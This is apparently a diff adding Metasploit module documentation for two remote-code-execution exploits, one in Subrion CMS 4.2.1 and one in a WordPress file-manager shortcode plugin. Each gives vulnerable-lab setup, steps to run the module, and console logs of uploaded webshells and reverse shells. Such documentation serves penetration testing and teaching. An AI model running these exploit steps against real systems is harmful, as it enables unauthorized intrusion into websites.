+    sudo apt install -y vim ufw curl unzip open-vm-tools open-vm-tools-desktop
+    sudo systemctl restart ufw
+    sudo systemctl enable ufw
+
+    # install mysql v5.7
+    # https://computingforgeeks.com/how-to-install-mysql-on-debian-linux-system/?expand_article=1
+    wget -P ~/Downloads/ https://dev.mysql.com/get/mysql-apt-config_0.8.18-1_all.deb
+    sudo dpkg -i ~/Downloads/mysql-apt-config_0.8.18-1_all.deb
+    sudo apt update -y && sudo apt upgrade -y
+
+    # if the above gives an error, run:
+    sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 467B942D3A79BD29
+    sudo apt update -y && sudo apt upgrade -y
+
+    # NOTE: I installed MySQL 5.7 in my first two attempts on a fresh Debian 10, but can't install it again afterwards because of error:
+    # E: Unable to locate package mysql-community-server
+    # If this happens, use Docker to serve a MySQL container:
+    # sudo apt install -y default-mysql-server docker.io
+    # sudo docker run --name subriondb -e MYSQL_ROOT_PASSWORD=root -d mysql:5.7.42-debian
+    # sudo docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' subriondb
+    # mysql -h [SUBRIONDB_IP] -u root -proot
+    # mysql -h [SUBRIONDB_IP] -u root -proot -e 'CREATE DATABASE subrion; GRANT ALL PRIVILEGES ON subrion.* TO root@[SUBRIONDB_IP] IDENTIFIED BY "root" WITH GRANT OPTION; FLUSH PRIVILEGES;'
+
+    # choose mysql-5.7, set root password "root", and allow MySQL remote connections
+    sudo apt install -y mysql-community-server 
+    sudo ufw allow mysql
+    sudo systemctl restart mysql
+    sudo systemctl enable mysql
+
+    # install php v7.3 and php extensions, and enable apache module
+    # https://computingforgeeks.com/install-php-on-debian-linux-systen/?expand_article=1
+    sudo apt update -y && sudo apt upgrade -y
+    sudo apt install -y php php-common
+    sudo apt install -y php-cli php-fpm php-json php-pdo php-mysql php-zip php-gd  php-mbstring php-curl php-xml php-pear php-bcmath
+    sudo apt install -y libapache2-mod-php
+    sudo a2enmod php7.*
+
+    # install apache2 v2.4.38
+    sudo apt update -y && sudo apt upgrade -y
+    sudo apt install -y apache2
+    sudo apt install -y libapache2-mod-php
+    sudo a2enmod rewrite
+    sudo systemctl restart apache2
+    sudo systemctl enable apache2
+
+    # create MySQL database for Subrion (with password "root")
+    mysql -u root -proot -e 'CREATE DATABASE subrion; GRANT ALL PRIVILEGES ON subrion.* TO root@localhost IDENTIFIED BY "root" WITH GRANT OPTION; FLUSH PRIVILEGES;'
+
+    # download and install Subrion 4.2.1
+    # https://www.vultr.com/docs/install-subrion-cms-with-lamp-stack-on-ubuntu-20-04/
+    # https://github.com/intelliants/subrion/wiki/Installation
+    sudo mkdir -p /var/www/subrion
+    sudo wget -P /var/www/subrion/ https://tools.subrion.org/get/latest.zip
+    sudo unzip /var/www/subrion/latest.zip -d /var/www/subrion/
+    sudo rm -rf /var/www/subrion/latest.zip
+    sudo chown -R www-data:www-data /var/www/subrion
+
+    # create virtual host for serving vulnerable Subrion website
+    sudo a2dissite /etc/apache2/sites-available/000-default.conf
+    sudo touch /etc/apache2/sites-available/subrion.conf
+    sudo bash -c 'cat << EOF > /etc/apache2/sites-available/subrion.conf
+    <VirtualHost *:80>
+        ServerName subrion-vuln.com
+        DocumentRoot "/var/www/subrion"
+        <Directory "/var/www/subrion">
+            Require all granted
+            Options -Indexes +FollowSymLinks
+            AllowOverride All
+            Order allow,deny
+            Allow from all
+        </Directory>
+    ErrorLog ${APACHE_LOG_DIR}/error.log
+    CustomLog ${APACHE_LOG_DIR}/access.log combined
+    </VirtualHost>
+    EOF'
+    sudo a2ensite subrion.conf
+    sudo systemctl restart apache2
+    echo '127.0.0.1 subrion-vuln.com' | sudo tee -a /etc/hosts
+
+    # navigate to subrion-vuln.com
+    python3 -m webbrowser 'http://subrion-vuln.com'
+    exit
+```
+
+This will set up Subrion CMS 4.2.1 as a virtual host website on `http://subrion-vuln.com` using the LAMP stack:
+
+    - Debian 10
+    - Apache Server v2.4.38
+    - MySQL v5.7.42
+    - PHP v7.3.31
+
+```sh
+ismail@debian:/usr/bin$ cat /etc/os-release 
+PRETTY_NAME="Debian GNU/Linux 10 (buster)"
+NAME="Debian GNU/Linux"
+VERSION_ID="10"
+VERSION="10 (buster)"
+VERSION_CODENAME=buster
+ID=debian
+HOME_URL="https://www.debian.org/"
+SUPPORT_URL="https://www.debian.org/support"
+BUG_REPORT_URL="https://bugs.debian.org/"
+
+ismail@debian:/usr/bin$ /usr/sbin/apache2 -v
+Server version: Apache/2.4.38 (Debian)
+Server built:   2023-04-21T22:01:00
+
+ismail@debian:/usr/bin$ mysql --version
+mysql  Ver 14.14 Distrib 5.7.42, for Linux (x86_64) using  EditLine wrapper
+
+ismail@debian:/usr/bin$ php -v
+PHP 7.3.31-1~deb10u4 (cli) (built: Jun 19 2023 19:10:11) ( NTS )
+Copyright (c) 1997-2018 The PHP Group
+Zend Engine v3.3.31, Copyright (c) 1998-2018 Zend Technologies
+    with Zend OPcache v7.3.31-1~deb10u4, Copyright (c) 1999-2018, by Zend Technologies
+```
+
+Once this is done, and the web browser opens up the Subrion CMS installation page at `http://subrion-vuln.com/install`,
+fill in the following fields in the `Configuration` page after passing the `Pre-Installation Check` and accepting the `Subrion License`:
+
+```
+    DB Hostname:  localhost (default)
+
+    # if using a MySQL Docker container, put in the IP address found from the output of the following command:
+    # sudo docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' subriondb
+
+    DB Username:  root
+    DB Password:  root
+    DB Name:      subrion
+    DB Port:      3306 (default)
+    Table Prefix: sbr421_ (default)
+
+    Administrator Configuration:
+
+    Username:  admin
+    Password:  admin
+    Confirm:   admin
+    Email:     anyemail@mail.com
+```
+
+Once the configuration is done, navigate to `http://subrion-vuln.com/panel/` and login as an Administrator to confirm successful setup.
+
+## Verification Steps
+
+1. Install and set up Subrion CMS v4.2.1 as described above.
+2. Verify that the Admin Panel login page can be accessed at `http://subrion-vuln.com/panel/`.
+3. Start `msfconsole`
+4. Do: `use exploit/multi/http/subrion_cms_file_upload_rce`
+5. Do: `set RHOSTS [SUBRION_SERVER_IP]`
+6. Do: `set RPORT [SUBRION_SERVER_PORT]`
+7. Do: `set USERNAME [username]`
+8. Do: `set PASSWORD [password]`
+9. Do: `set LHOST eth0`
+10. Do: `exploit`
+
+## Options
+
+### RPORT (Required)
+
+This is the default HTTP port 80 for the Subrion CMS website.
+
+### TARGETURI (Required)
+
+This is the base path of the Subrion CMS's website. Can be changed in case the files are not installed as a VHost,
+for example, in `/var/www/html/subrion/*` and not in `/var/www/subrion/*`
+
+### USERNAME (Required)
+
+This is the username for the Subrion CMS admin panel page, required for exploitation.
+
+### PASSWORD (Required)
+
+This is the password for the Subrion CMS admin panel page, also required for exploitation.
+
+## Scenarios
+
+### Subrion CMS v4.1.0 with Docker on Debian 10
+
+* Using PHP payload - default TARGET 0
+
+```
+msf6 > use exploit/multi/http/subrion_cms_file_upload_rce 
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set RHOSTS 192.168.245.138
+RHOSTS => 192.168.245.138
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set RPORT 8080
+RPORT => 8080
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set LHOST eth0
+LHOST => eth0
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.245.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking target web server for a response at: http://192.168.245.138:8080/panel/
+[+] Target is running Subrion CMS.
+[*] Checking Subrion CMS version...
+[+] Target is running Subrion CMS Version 4.1.0.
+[+] The target appears to be vulnerable. However, this version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
+[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
+[+] Successfully obtained CSRF token: 9cedb67d955cadc5fac7dc7ddf32e425
+[*] Logging in to Subrion Admin Panel at: http://192.168.245.138:8080/panel/ using credentials admin:admin
+[+] Successfully logged in as Administrator.
+[*] Preparing payload...
+[*] Sending POST data...
+[+] Successfully uploaded payload at: http://192.168.245.138:8080/uploads/zftofixpwb.phar
+[*] Executing 'zftofixpwb.phar'... This file will be deleted after execution.
+[*] Sending stage (39927 bytes) to 192.168.245.138
+[*] Meterpreter session 1 opened (192.168.245.128:4444 -> 192.168.245.138:56994) at 2023-07-30 01:56:57 -0400
+[+] Successfully executed payload: http://192.168.245.138:8080/uploads/zftofixpwb.phar
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer    : 986c4ddc755b
+OS          : Linux 986c4ddc755b 4.19.0-25-amd64 #1 SMP Debian 4.19.289-1 (2023-07-24) x86_64
+Meterpreter : php/linux
+meterpreter >
+```
+
+### Subrion CMS v4.1.0 with Docker on Windows 10
+
+* Using PHP payload - default TARGET 0
+
+```
+msf6 > use exploit/multi/http/subrion_cms_file_upload_rce 
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set RHOSTS 192.168.29.1
+RHOSTS => 192.168.29.1
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set RPORT 8080
+RPORT => 8080
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set LHOST eth0
+LHOST => eth0
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set PASSWORD 123456
+PASSWORD => 123456
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.245.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking target web server for a response at: http://192.168.29.1:8080/panel/
+[+] Target is running Subrion CMS.
+[*] Checking Subrion CMS version...
+[+] Target is running Subrion CMS Version 4.1.0.
+[+] The target appears to be vulnerable. However, this version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
+[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
+[+] Successfully obtained CSRF token: 3e1ab07d6802525ce76747c40f117961
+[*] Logging in to Subrion Admin Panel at: http://192.168.29.1:8080/panel/ using credentials admin:123456
+[+] Successfully logged in as Administrator.
+[*] Preparing payload...
+[*] Sending POST data...
+[+] Successfully uploaded payload at: http://192.168.29.1:8080/uploads/dckfdvdmrr.phar
+[*] Executing 'dckfdvdmrr.phar'... This file will be deleted after execution.
+[*] Sending stage (39927 bytes) to 192.168.245.1
+[*] Meterpreter session 1 opened (192.168.245.128:4444 -> 192.168.245.1:50985) at 2023-07-30 04:13:51 -0400
+[+] Successfully executed payload: http://192.168.29.1:8080/uploads/dckfdvdmrr.phar
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer    : 3514d9412b2d
+OS          : Linux 3514d9412b2d 5.15.90.1-microsoft-standard-WSL2 #1 SMP Fri Jan 27 02:56:13 UTC 2023 x86_64
+Meterpreter : php/linux
+meterpreter > 
+```
+
+### Subrion CMS v4.2.1 with XAMPP on Windows Server 2016
+
+* Using PHP payload - default TARGET 0
+
+```
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > run rhosts=192.168.100.103 lhost=192.168.100.1 username=admin password=123456 verbose=true targeturi=subrion/
+
+[*] Started reverse TCP handler on 192.168.100.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking target web server for a response at: http://192.168.100.103/panel/
+[+] Target is running Subrion CMS.
+[*] Checking Subrion CMS version...
+[+] Target is running Subrion CMS Version 4.2.1.
+[+] The target appears to be vulnerable. However, this version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
+[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
+[+] Successfully obtained CSRF token: JV9hc6PcMf0fO9VF9uqEMkiWQvNBiredsOQuqYtb
+[*] Logging in to Subrion Admin Panel at: http://192.168.100.103/panel/ using credentials admin:123456
+[+] Successfully logged in as Administrator.
+[*] Preparing payload...
+[*] Sending POST data...
+[+] Successfully uploaded payload at: http://192.168.100.103/subrion/uploads/ftxweolrol.phar
+[*] Executing 'ftxweolrol.phar'... This file will be deleted after execution.
+[*] Sending stage (39927 bytes) to 192.168.100.103
+[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.103:50048) at 2023-07-27 18:20:46 +0200
+[+] Successfully executed payload: http://192.168.100.103/subrion/uploads/ftxweolrol.phar
+
+meterpreter > getuid
+Server username: Administrator
+meterpreter > sysinfo
+Computer    : WIN2019
+OS          : Windows NT WIN2019 10.0 build 17763 (Windows Server 2016) AMD64
+Meterpreter : php/windows
+```
+
+### Subrion CMS v4.2.1 with XAMPP on Windows 10
+
+* Using PHP paylod - default TARGET 0
+
+```
+msf6 > use exploit/multi/http/subrion_cms_file_upload_rce 
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set RHOSTS 192.168.29.1
+RHOSTS => 192.168.29.1
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set LHOST eth0
+LHOST => eth0
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set PASSWORD 123456
+PASSWORD => 123456
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.245.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking target web server for a response at: http://192.168.29.1/panel/
+[+] Target is running Subrion CMS.
+[*] Checking Subrion CMS version...
+[+] Target is running Subrion CMS Version 4.2.1.
+[+] The target appears to be vulnerable. However, this version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
+[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
+[+] Successfully obtained CSRF token: xjUlGn2ZDOBA2ZhobPAmuC17wZXpVxyjVsLBqF54
+[*] Logging in to Subrion Admin Panel at: http://192.168.29.1/panel/ using credentials admin:123456
+[+] Successfully logged in as Administrator.
+[*] Preparing payload...
+[*] Sending POST data...
+[+] Successfully uploaded payload at: http://192.168.29.1/uploads/wvkjygteyz.phar
+[*] Executing 'wvkjygteyz.phar'... This file will be deleted after execution.
+[*] Sending stage (39927 bytes) to 192.168.245.1
+[*] Meterpreter session 1 opened (192.168.245.128:4444 -> 192.168.245.1:51466) at 2023-07-30 03:24:33 -0400
+[+] Successfully executed payload: http://192.168.29.1/uploads/wvkjygteyz.phar
+
+meterpreter > getuid
+Server username: SYSTEM
+meterpreter > sysinfo
+Computer    : DESKTOP-50BU5J8
+OS          : Windows NT DESKTOP-50BU5J8 10.0 build 19045 (Windows 10) AMD64
+Meterpreter : php/windows
+meterpreter > 
+```
+
+### Subrion CMS v4.2.1 with LAMP Stack on Debian 10
+
+* Using PHP paylod - default TARGET 0
+
+```
+msf6 > use exploit/multi/http/subrion_cms_file_upload_rce
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set RHOSTS 192.168.245.133
+RHOSTS => 192.168.245.133
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set LHOST eth0
+LHOST => 192.168.245.128
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.245.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking target web server for a response at: http://192.168.245.133:80/panel/
+[+] Target is running Subrion CMS.
+[*] Checking Subrion CMS version...
+[+] Target is running Subrion CMS Version 4.2.1.
+[!] This version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
+[+] The target appears to be vulnerable.
+[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
+[+] Successfully obtained CSRF token: mKMUcUoMJjRxTxOog8DXxeFxLGQVU7rHSX6slM85
+[*] Logging in to Subrion Admin Panel at: http://192.168.245.133/panel/ using credentials admin:admin
+[+] Successfully logged in as Administrator.
+[*] Preparing payload...
+[*] Sending POST data...
+[+] Successfully uploaded payload at: http://192.168.245.133/uploads/htwgmjllep.phar
+[*] Executing 'htwgmjllep.phar'... This file will be deleted after execution.
+[*] Sending stage (39927 bytes) to 192.168.245.133
+[*] Meterpreter session 1 opened (192.168.245.128:4444 -> 192.168.245.133:53698) at 2023-07-21 14:21:17 -0400
+[+] Successfully executed payload: http://192.168.245.133/uploads/htwgmjllep.phar
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer    : debian
+OS          : Linux debian 4.19.0-24-amd64 #1 SMP Debian 4.19.282-1 (2023-04-29) x86_64
+Meterpreter : php/linux
+meterpreter > 
+```
+
+### Subrion CMS v4.2.1 on Ubuntu 20.04 (Exfiltrated from Proving Grounds Practice)
+
+* Using PHP paylod - default TARGET 0
+
+```
+msf6 > use exploit/multi/http/subrion_cms_file_upload_rce
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set RHOSTS 192.168.195.163
+RHOSTS => 192.168.195.163
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set LHOST tun0
+LHOST => tun0
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set LPORT 80
+LPORT => 80
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.45.162:80 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking target web server for a response at: http://192.168.195.163:80/panel/
+[+] Target is running Subrion CMS.
+[*] Checking Subrion CMS version...
+[+] Target is running Subrion CMS Version 4.2.1.
+[!] This version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
+[+] The target appears to be vulnerable.
+[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
+[+] Successfully obtained CSRF token: rtPDWFrHa45hIhhXhLknM7DbWiHqAfux1fziFd3j
+[*] Logging in to Subrion Admin Panel at: http://192.168.195.163/panel/ using credentials admin:admin
+[+] Successfully logged in as Administrator.
+[*] Preparing payload...
+[*] Sending POST data...
+[+] Successfully uploaded payload at: http://192.168.195.163/uploads/ixqywjyjyd.phar
+[*] Executing 'ixqywjyjyd.phar'... This file will be deleted after execution.
+[*] Sending stage (39927 bytes) to 192.168.195.163
+[*] Meterpreter session 1 opened (192.168.45.162:80 -> 192.168.195.163:57658) at 2023-07-24 10:35:58 -0400
+[+] Successfully executed payload: http://192.168.195.163/uploads/ixqywjyjyd.phar
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer    : exfiltrated
+OS          : Linux exfiltrated 5.4.0-74-generic #83-Ubuntu SMP Sat May 8 02:35:39 UTC 2021 x86_64
+Meterpreter : php/linux
+meterpreter > shell
+Process 2489 created.
+Channel 0 created.
+cat /etc/os-release               
+NAME="Ubuntu"
+VERSION="20.04.2 LTS (Focal Fossa)"
+ID=ubuntu
+ID_LIKE=debian
+PRETTY_NAME="Ubuntu 20.04.2 LTS"
+VERSION_ID="20.04"
+HOME_URL="https://www.ubuntu.com/"
+SUPPORT_URL="https://help.ubuntu.com/"
+BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
+PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
+VERSION_CODENAME=focal
+UBUNTU_CODENAME=focal
+```
@@ -0,0 +1,353 @@
+## Vulnerable Application
+
+WordPress File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution through shortcode.
+
+The WordPress plugin does not adequately prevent uploading files with disallowed MIME types when using the shortcode.
+This leads to RCE in cases where the allowed MIME type list does not include PHP files.
+In the worst case, this is available to unauthenticated users, but is also works in an authenticated configuration.
+
+File Manager Advanced Shortcode plugin version `2.3.2` and lower are vulnerable.
+To install the Shortcode plugin, File Manager Advanced version `5.0.5` or lower is required to keep the configuration vulnerable.
+Any user can exploit this vulnerability which results in access to the underlying operating system with the same privileges
+under which the WordPress web services run.
+
+For more information, see [This Article](https://attackerkb.com/topics/JncRCWZ5xm/cve-2023-2068).
+
+This module has been tested on:
+* Windows  Server 2019 Standard and Kali Linux running on Raspberry PI.
+* WordPress 6.2.2
+* File Manager Advanced 5.0.5
+* File Manager Advanced Shortcode 2.3.2
+
+**Instructions for a vulnerable WordPress installation:**
+Create a new docker-compose.yml file:
+```
+version: '3.1'
+
+services:
+
+  wordpress:
+    image: wordpress:6.2.2-php8.0
+    restart: always
+    ports:
+      - 8080:80
+    environment:
+      WORDPRESS_DB_HOST: db
+      WORDPRESS_DB_USER: exampleuser
+      WORDPRESS_DB_PASSWORD: examplepass
+      WORDPRESS_DB_NAME: exampledb
+
+  db:
+    image: mysql:5.7
+    restart: always
+    environment:
+      MYSQL_DATABASE: exampledb
+      MYSQL_USER: exampleuser
+      MYSQL_PASSWORD: examplepass
+      MYSQL_RANDOM_ROOT_PASSWORD: '1'
+```
+
+Now start the application:
+```
+docker-compose up
+```
+
+Then verify the application is running at http://127.0.0.1:8080 - and complete the installation steps.
+
+## Installing the vulnerable application
+After you have successfully installed and configured WordPress, follow the below steps to install the vulnerable plugins.
+From the same directory as the `docker-compose.yml` file enter into an interactive terminal:
+```
+docker-compose exec -it wordpress /bin/bash
+```
+
+Inside the container install the first plugin - `file-manager-advanced`:
+```
+cd /var/www/html/wp-content/plugins
+apt update
+apt install unzip
+curl -O https://downloads.wordpress.org/plugin/file-manager-advanced.5.0.zip
+unzip ./file-manager-advanced.5.0.zip
+unzip file-manager-advanced/file-manager-advanced.zip
+rm ./file-manager-advanced.5.0.zip
+rm file-manager-advanced/file-manager-advanced.zip
+```
+
+Then for the second plugin - `file-manager-advanced-shortcode`
+```
+cd /var/www/html/wp-content/plugins
+curl -L -O https://github.com/h00die-gr3y/Metasploit/raw/main/images/file-manager-advanced-shortcode-2.3.2-mdnhux.zip
+```
+
+Verify the sha256 matches - `3d5ff82293ec2d98d1f70f27434f810c0c02d38f97d512332a43b8777dde09fe`. *Note - if this does not match we advise a security review of the plugin*:
+```
+sha256sum ./file-manager-advanced-shortcode-2.3.2-mdnhux.zip
+
+3d5ff82293ec2d98d1f70f27434f810c0c02d38f97d512332a43b8777dde09fe  ./file-manager-advanced-shortcode-2.3.2-mdnhux.zip
+```
+
+Extract the plugin and remove the upgrade script:
+```
+unzip file-manager-advanced-shortcode-2.3.2-mdnhux.zip
+apt install vim
+
+# Delete the upgrade library file
+rm file-manager-advanced-shortcode/upgrade/upgrade.php
+
+# Delete the upgrade requests
+vim file-manager-advanced-shortcode/file-manager-advanced-shortcode.php
+
+# Ensure these lines are removed from 'file-manager-advanced-shortcode/file-manager-advanced-shortcode.php'
+# require_once ( 'upgrade/upgrade.php');
+# new file_manager_advanced_shortcode_updates( $fma_plugin_current_version, $fma_plugin_remote_path, $fma_plugin_slug, $fma_license_order, $fma_license_key );
+```
+
+Now activate the plugins and create the vulnerable Wordpress page.
+1. Login as the previously created Wordpress account
+2. On left side menu, then go to `Plugins`
+3. Activate the File Manager Advanced plugin
+4. Activate the File Manager Advanced Shortcode plugin
+5. Navigate to `Pages` on the left side menu and select `Add New`
+6. Click the `+` symbol in the top left of the webpage and search for `Shortcode`
+7. Select `Shortcode` and paste the follow Shortcode:
+    ```
+    [file_manager_advanced login="yes" roles="author,editor,administrator" path="wp-content" hide="plugins" operations="download,upload"
+     block_users="5" view="grid" theme="light" lang ="en" upload_allow="image/png" upload_max_size="2G"]
+    ```
+8. Set the `TARGETURI` option with the uripath pointing to this webpage e.g. `/?page_id=5`
+9. Run the module and enjoy a `reverse shell` or `meterpreter`
+
+## Verification Steps
+
+List the steps needed to make sure this thing works
+
+- [ ] Start `msfconsole`
+- [ ] `use exploit/multi/http/wp_plugin_fma_shortcode_unauth_rce`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper, 3=Windows Command, 4=Windows Dropper>`
+- [ ] `exploit`
+- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings
+
+```
+msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > info
+
+       Name: Wordpress File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution through shortcode
+     Module: exploit/multi/http/wp_plugin_fma_shortcode_unauth_rce
+   Platform: Windows, Unix, Linux, PHP
+       Arch: cmd, php, x64, x86, aarch64
+ Privileged: No
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+  Disclosed: 2023-05-31
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+  Mateus Machado Tesser
+
+Module side effects:
+ artifacts-on-disk
+ ioc-in-logs
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Available targets:
+      Id  Name
+      --  ----
+  =>  0   PHP
+      1   Unix Command
+      2   Linux Dropper
+      3   Windows Command
+      4   Windows Dropper
+
+Check supported:
+  Yes
+
+Basic options:
+  Name       Current Setting                Required  Description
+  ----       ---------------                --------  -----------
+  Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS     192.168.201.10                 yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+  RPORT      80                             yes       The target port (TCP)
+  SSL        false                          no        Negotiate SSL/TLS for outgoing connections
+  SSLCert                                   no        Path to a custom SSL certificate (default is randomly generated)
+  TARGETURI  /wordpress/index.php/fma-auth  yes       File Manager Advanced (FMA) Shortcode URI path
+  URIPATH                                   no        The URI to use for this exploit (default is random)
+  VHOST                                     no        HTTP server virtual host
+  WEBSHELL                                  no        The name of the webshell with extension php. Webshell name will be randomly generated if left unset.
+
+
+  When TARGET is not 0:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  COMMAND  passthru         yes       Use PHP command function (Accepted: passthru, shell_exec, system, exec)
+
+
+  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all
+                                       addresses.
+  SRVPORT  1981             yes       The local port to listen on.
+
+Payload information:
+
+Description:
+  The Wordpress plugin does not adequately prevent uploading files with disallowed MIME types when using the shortcode.
+  This leads to RCE in cases where the allowed MIME type list does not include PHP files.
+  In the worst case, this is available to unauthenticated users, but is also works in an authenticated configuration.
+  File Manager Advanced Shortcode plugin version `2.3.2` and lower are vulnerable.
+  To install the Shortcode plugin File Manager Advanced version `5.0.5` or lower is required to keep the configuration
+  vulnerable. Any user privileges can exploit this vulnerability which results in access to the underlying operating system
+  with the same privileges under which the Wordpress web services run.
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2023-2068
+  https://attackerkb.com/topics/JncRCWZ5xm/cve-2023-2068
+  https://packetstormsecurity.com/files/172707
+  https://wpscan.com/vulnerability/58f72953-56d2-4d86-a49b-311b5fc58056
+
+
+View the full module info with the info -d command.
+```
+## Options
+
+### TARGETURI
+The uripath to the webpage where the file-manager-advanced shortcode is embedded.
+
+### WEBSHELL
+You can use this option to set the filename and extension (should be .php) of the webshell.
+This is handy if you want to test the webshell upload and execution with different file names.
+to bypass any security settings on the Web and PHP server.
+
+### COMMAND
+This option provides the user to choose the PHP underlying shell command function to be used for execution.
+The choices are `system()`, `passthru()`, `shell_exec()` and `exec()` and it defaults to `passthru()`.
+This option is only available when the target selected is either Unix Command or Linux Dropper.
+For the native PHP target, by default the `eval()` function will be used for native PHP code execution.
+
+## Scenarios
+### Windows Server 2019 PHP - php/meterpreter/reverse_tcp
+```
+msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. fmakey successfully retrieved: 2a1a319c46
+[*] Executing PHP for php/meterpreter/reverse_tcp
+[*] Sending stage (39927 bytes) to 192.168.201.55
+[+] Deleted KBWxIdRChosZC.php
+[*] Meterpreter session 1 opened (192.168.201.10:4444 -> 192.168.201.55:50380) at 2023-06-28 14:13:07 +0000
+
+meterpreter > sysinfo
+Computer    : WIN-BJDNH44EEDB
+OS          : Windows NT WIN-BJDNH44EEDB 10.0 build 17763 (Windows Server 2016) AMD64
+Meterpreter : php/windows
+meterpreter > getuid
+Server username: SYSTEM
+meterpreter >
+```
+### Kali Linux Server Unix Command -  cmd/unix/reverse_bash
+```
+msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. fmakey successfully retrieved: 5a669fda54
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[+] Deleted LlCresesS.php
+[*] Command shell session 5 opened (192.168.201.10:4444 -> 192.168.201.10:56290) at 2023-06-28 15:34:20 +0000
+
+uname -a
+Linux cerberus 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-03) aarch64 GNU/Linux
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+```
+### Kali Linux Server Linux Dropper -  linux/aarch64/meterpreter_reverse_tcp
+```
+msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. fmakey successfully retrieved: 5a669fda54
+[*] Executing Linux Dropper for linux/aarch64/meterpreter_reverse_tcp
+[*] Using URL: http://192.168.201.10:1981/manX3C
+[*] Client 192.168.201.10 (Wget/1.21.3) requested /manX3C
+[*] Sending payload to 192.168.201.10 (Wget/1.21.3)
